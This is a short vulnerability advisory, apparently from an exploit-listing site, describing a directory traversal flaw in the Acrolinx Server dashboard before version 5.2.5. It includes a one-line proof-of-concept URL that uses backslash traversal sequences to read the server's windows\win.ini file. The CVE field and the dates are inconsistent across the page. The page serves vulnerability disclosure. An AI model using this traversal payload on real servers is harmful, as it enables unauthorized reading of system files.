Acrolinx Server Directory Traversal

2018-03-27 / 2018-04-07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Exploit Title: Acrolinx Dashboard Directory Traversal # CVE: CVE 2018-7719 # Date: 19.02.2017 # Exploit Author: Berk Dusunur # Vendor Homepage: www.acrolinx.com # Version:Before 5.2.5 PoC Acrolinx dashboard windows works on the server. http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top